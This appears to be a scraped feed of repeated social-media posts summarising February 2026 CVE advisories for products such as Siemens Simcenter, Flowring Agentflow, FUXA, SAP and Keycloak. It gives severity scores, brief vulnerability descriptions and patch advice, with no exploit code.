A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
π https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
3 posts
π¨ CVE-2026-2095: CRITICAL auth bypass in all Flowring Agentflow versions. Remote attackers can impersonate any user β no patch available. Restrict access & monitor for abnormal logins. https://radar.offseq.com/threat/cve-2026-2095-cwe-288-authentication-bypass-using--1f37d3de #OffSeq #Cybersecurity #Vulnerability #Agentflow
##π΄ CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
7 posts
π¨ CRITICAL vuln: CVE-2026-2096 in Flowring Agentflow (all versions). Unauthenticated attackers can read, modify, or delete DB contents due to authentication bypass. No fix yet β restrict access! https://radar.offseq.com/threat/cve-2026-2096-cwe-288-authentication-bypass-using--10f90ea1 #OffSeq #Vulnerability #Agentflow #InfoSec
##π΄ CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2025-11547 - High (7.8)
AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.
π https://www.thehackerwire.com/vulnerability/CVE-2025-11547/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-11547 - High (7.8)
AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.
π https://www.thehackerwire.com/vulnerability/CVE-2025-11547/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-0485 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0485/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-0485 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0485/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-23689 - High (7.7)
Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23689 - High (7.7)
Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
CRITICAL: CVE-2026-25895 in frangoteam FUXA (<1.2.10) enables unauthenticated path traversal β arbitrary file writes on SCADA/HMI servers. Patch to 1.2.10+ ASAP to mitigate severe OT risk! https://radar.offseq.com/threat/cve-2026-25895-cwe-22-improper-limitation-of-a-pat-61293111 #OffSeq #SCADA #ICS #Vuln
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-25958 - High (7.7)
Cube is a semantic layer for building data applications. From 0.27.19 to before 1.5.13, 1.4.2, and 1.0.14, it is possible to make a specially crafted request with a valid API token that leads to privilege escalation. This vulnerability is fixed in...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25958/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25958 - High (7.7)
Cube is a semantic layer for building data applications. From 0.27.19 to before 1.5.13, 1.4.2, and 1.0.14, it is possible to make a specially crafted request with a valid API token that leads to privilege escalation. This vulnerability is fixed in...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25958/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2026-25890 - High (8.1)
File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by mo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25890/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25890 - High (8.1)
File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by mo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25890/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
1 repos
https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE
π CVE-2026-25961 - High (7.5)
SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker w...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25961/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
π CVE-2026-25925 - High (7.8)
PowerDocu contains a Windows GUI executable to perform technical documentations. Prior to 2.4.0, PowerDocu contains a critical security vulnerability in how it parses JSON files within Flow or App packages. The application blindly trusts the $type...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25925/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:04:10.197000
2 posts
π CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T14:33:38.680000
2 posts
π CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
2 posts
π CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
2 posts
1 repos
π CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:33
2 posts
π CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:33
2 posts
π CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
π CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:27
2 posts
π CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
4 posts
π CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
6 posts
π CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:27
2 posts
π΄ CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
π https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
π https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:27
2 posts
π CVE-2026-2093 - High (7.5)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2093/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2093 - High (7.5)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2093/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:45
8 posts
βΌοΈ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##π CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##βΌοΈ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##π CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:45
4 posts
π CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:39
2 posts
π CVE-2026-0490 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-0490 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:59
1 posts
1 repos
https://github.com/mbanyamer/CVE-2026-25939-SCADA-FUXA-Unauthenticated-Remote-Arbitrary
π CVE-2026-25939: CRITICAL auth bypass in frangoteam FUXA (<1.2.11). Unauthenticated attackers can modify schedulers β risking ICS/SCADA disruption. Patch to 1.2.11+ now! https://radar.offseq.com/threat/cve-2026-25939-cwe-862-missing-authorization-in-fr-75e34d8a #OffSeq #ICS #Vulnerability #SCADA
##updated 2026-02-10T02:56:49
1 posts
β οΈ CRITICAL: CVE-2026-25894 in frangoteam FUXA (<1.2.10) lets unauthenticated attackers forge admin JWT tokens & execute code. Patch to 1.2.10+, audit secrets, restrict access. Protect your ICS! https://radar.offseq.com/threat/cve-2026-25894-cwe-321-use-of-hard-coded-cryptogra-a10e5fe5 #OffSeq #ICS #Vulnerability #SCADA
##updated 2026-02-10T02:56:44
1 posts
β οΈ CRITICAL: CVE-2026-25893 in frangoteam FUXA (<1.2.10) lets unauthenticated attackers gain admin rights via the heartbeat API & execute code. Immediate patching to 1.2.10+ is essential for all ICS/SCADA deployments. https://radar.offseq.com/threat/cve-2026-25893-cwe-285-improper-authorization-in-f-a5914f35 #OffSeq #ICS #SCADA #Vuln
##updated 2026-02-10T02:56:34
1 posts
π΄ CVE-2026-25881 - Critical (9)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global p...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:05
1 posts
π CVE-2026-25892 - High (7.5)
Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint la...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25892/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:15:52.143000
2 posts
π CVE-2026-1486 - High (8.8)
A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-1486 - High (8.8)
A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T01:16:41
2 posts
π CVE-2025-69214 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attac...
π https://www.thehackerwire.com/vulnerability/CVE-2025-69214/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-69214 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attac...
π https://www.thehackerwire.com/vulnerability/CVE-2025-69214/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T00:30:37
2 posts
π CVE-2025-15310 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.
π https://www.thehackerwire.com/vulnerability/CVE-2025-15310/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-15310 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.
π https://www.thehackerwire.com/vulnerability/CVE-2025-15310/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T00:30:37
2 posts
